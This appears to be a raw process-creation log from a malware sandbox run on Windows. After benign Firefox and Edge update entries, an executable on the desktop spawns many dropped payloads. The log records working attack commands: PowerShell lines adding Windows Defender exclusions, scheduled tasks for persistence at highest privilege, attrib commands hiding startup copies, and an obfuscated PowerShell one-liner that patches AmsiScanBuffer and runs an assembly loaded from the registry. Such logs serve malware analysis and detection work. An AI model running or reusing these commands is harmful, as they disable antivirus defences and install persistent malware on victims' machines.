"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 27229 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9cc0e51e-95aa-4547-9b13-6ad1322d4b08} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3264 -childID 1 -isForBrowser -prefsHandle 2980 -prefMapHandle 2848 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75d88463-c8cc-4742-837f-cf01e8033871} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3844 -childID 2 -isForBrowser -prefsHandle 3836 -prefMapHandle 3832 -prefsLen 32603 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9130ac1f-16ad-4cb5-9017-be9c7f3016be} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4680 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4672 -prefMapHandle 4676 -prefsLen 32603 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f93c553-1a5b-4df9-99f5-1047f643c37a} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5332 -childID 3 -isForBrowser -prefsHandle 5324 -prefMapHandle 4688 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {06250da0-bfc0-4206-8418-b7c9fe76ac6e} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5476 -childID 4 -isForBrowser -prefsHandle 5484 -prefMapHandle 5488 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94944873-ef8d-4978-bc1f-b97a2617367b} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5668 -childID 5 -isForBrowser -prefsHandle 5676 -prefMapHandle 5680 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da95f5f0-4211-41c8-bc9c-919e72244a0a} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7REU2RkFENEQtNjM2RS00RUEzLTgxMzAtOTFEQTc4Q0JBQjIxfSIgdXNlcmlkPSJ7MzVEMjA0RkQtMjdEOC00RTk2LUE3MDItN0VEMjE5NTJEMkQ2fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RDhDMjhEREQtMjU2Ri00MjY4LUI4RDQtQ0VFNDg2ODdEQzkxfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczOTI5NDgzNCIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNzY2NTUyNTM3MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUzMTEyNzI0MjAiLz48L2FwcD48L3JlcXVlc3Q-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3256 -childID 6 -isForBrowser -prefsHandle 3456 -prefMapHandle 2840 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f433fd1-071a-4ba0-8e0e-b7fa991ec34e} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5448 -childID 7 -isForBrowser -prefsHandle 5424 -prefMapHandle 5440 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebd8e86f-5ca9-4f13-9c64-e4be28907c4b} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2964 -childID 8 -isForBrowser -prefsHandle 6428 -prefMapHandle 2956 -prefsLen 33998 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4679e6b9-9569-4719-aad4-d727965235fc} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6440 -childID 9 -isForBrowser -prefsHandle 1640 -prefMapHandle 6620 -prefsLen 27941 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a408787-ffd7-4646-a7b9-2b98af782eb8} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6680 -childID 10 -isForBrowser -prefsHandle 6892 -prefMapHandle 6888 -prefsLen 27941 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b774784c-8211-47dc-90c4-10b9449fb05a} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\MicrosoftEdge_X64_133.0.3065.59.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff785436a68,0x7ff785436a74,0x7ff785436a80
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff785436a68,0x7ff785436a74,0x7ff785436a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6acd96a68,0x7ff6acd96a74,0x7ff6acd96a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6acd96a68,0x7ff6acd96a74,0x7ff6acd96a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6acd96a68,0x7ff6acd96a74,0x7ff6acd96a80
C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe
"C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe"
C:\Program Files\ProcessMonitor\Procmon64.exe
"C:\Program Files\ProcessMonitor\Procmon64.exe"
C:\Program Files\ProcessMonitor\Procmon.exe
"C:\Program Files\ProcessMonitor\Procmon.exe"
C:\Users\Admin\AppData\Local\Temp\Procmon64.exe
"C:\Users\Admin\AppData\Local\Temp\Procmon64.exe" /originalpath "C:\Program Files\ProcessMonitor\Procmon.exe"
C:\Program Files\sysint\Procmon64.exe
"C:\Program Files\sysint\Procmon64.exe"
C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\Fast%20Download.exe
"C:\Users\Admin\Desktop\Files\Fast%20Download.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
C:\Users\Admin\Desktop\Files\XClient.exe
"C:\Users\Admin\Desktop\Files\XClient.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\Desktop\Files\built.exe
"C:\Users\Admin\Desktop\Files\built.exe"
C:\Users\Admin\Desktop\Files\key.exe
"C:\Users\Admin\Desktop\Files\key.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 400
C:\Users\Admin\Desktop\Files\contorax.exe
"C:\Users\Admin\Desktop\Files\contorax.exe"
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
"C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\built.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\T4gy0CnbOZcl.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2wVHvYK17sCW.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\Sentil.exe
"C:\Users\Admin\Desktop\Files\Sentil.exe"
C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe
"C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\Files\Security.exe
"C:\Users\Admin\Desktop\Files\Security.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\Files\Client-built.exe
"C:\Users\Admin\Desktop\Files\Client-built.exe"
C:\Users\Admin\AppData\Local\Temp\$77Security.exe
"C:\Users\Admin\AppData\Local\Temp\$77Security.exe"
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:eYxrkBgfPWtB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mqPvfiVZWPJRjr,[Parameter(Position=1)][Type]$mpQFhykSbP)$jIppYFpwEhi=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Refl'+'e'+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+'D'+'e'+'leg'+'a'+'te'+'T'+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+'n'+'s'+''+[Char](105)+'C'+'l'+'a'+'s'+''+'s'+',A'+[Char](117)+''+[Char](116)+'oC'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$jIppYFpwEhi.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+'g'+','+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$mqPvfiVZWPJRjr).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$jIppYFpwEhi.DefineMethod(''+'I'+'nv'+'o'+'k'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+'H'+'i'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+'i'+'g'+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+'lo'+'t'+''+','+'V'+[Char](105)+'rt'+'u'+'a'+[Char](108)+'',$mpQFhykSbP,$mqPvfiVZWPJRjr).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'ime'+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $jIppYFpwEhi.CreateType();}$AwvzxgReJitYU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'ste'+'m'+''+'.'+''+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+''+'W'+'i'+[Char](110)+''+'3'+'2'+'.'+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+'fe'+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+[Char](118)+'e'+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$QYVgjFKiADBKpP=$AwvzxgReJitYU.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+'r'+'oc'+'A'+''+'d'+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'St'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XuRSdepCyIHsseQFTlK=eYxrkBgfPWtB @([String])([IntPtr]);$frMFLkiRfMTXoGuBloAVuT=eYxrkBgfPWtB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XLkjeedKkrZ=$AwvzxgReJitYU.GetMethod(''+[Char](71)+'etMo'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'H'+'a'+'n'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+'ll')));$ZMoanjlXjbTSRq=$QYVgjFKiADBKpP.Invoke($Null,@([Object]$XLkjeedKkrZ,[Object]('L'+[Char](111)+'a'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$JJEwvHNtPEjoRYuON=$QYVgjFKiADBKpP.Invoke($Null,@([Object]$XLkjeedKkrZ,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$EwGuUkl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZMoanjlXjbTSRq,$XuRSdepCyIHsseQFTlK).Invoke('a'+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$XvjloYXHHsDbZEtcY=$QYVgjFKiADBKpP.Invoke($Null,@([Object]$EwGuUkl,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+'S'+''+'c'+'anB'+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$ssvSumgWpx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JJEwvHNtPEjoRYuON,$frMFLkiRfMTXoGuBloAVuT).Invoke($XvjloYXHHsDbZEtcY,[uint32]8,4,[ref]$ssvSumgWpx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XvjloYXHHsDbZEtcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JJEwvHNtPEjoRYuON,$frMFLkiRfMTXoGuBloAVuT).Invoke($XvjloYXHHsDbZEtcY,[uint32]8,0x20,[ref]$ssvSumgWpx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+''+'W'+''+'A'+''+'R'+''+'E'+'').GetValue('$'+'7'+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KeBeUxMxt5rs.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2f5dd3e4-d53d-410e-b3fd-fc4b177ea6d0}
C:\Windows\System32\schtasks.exe
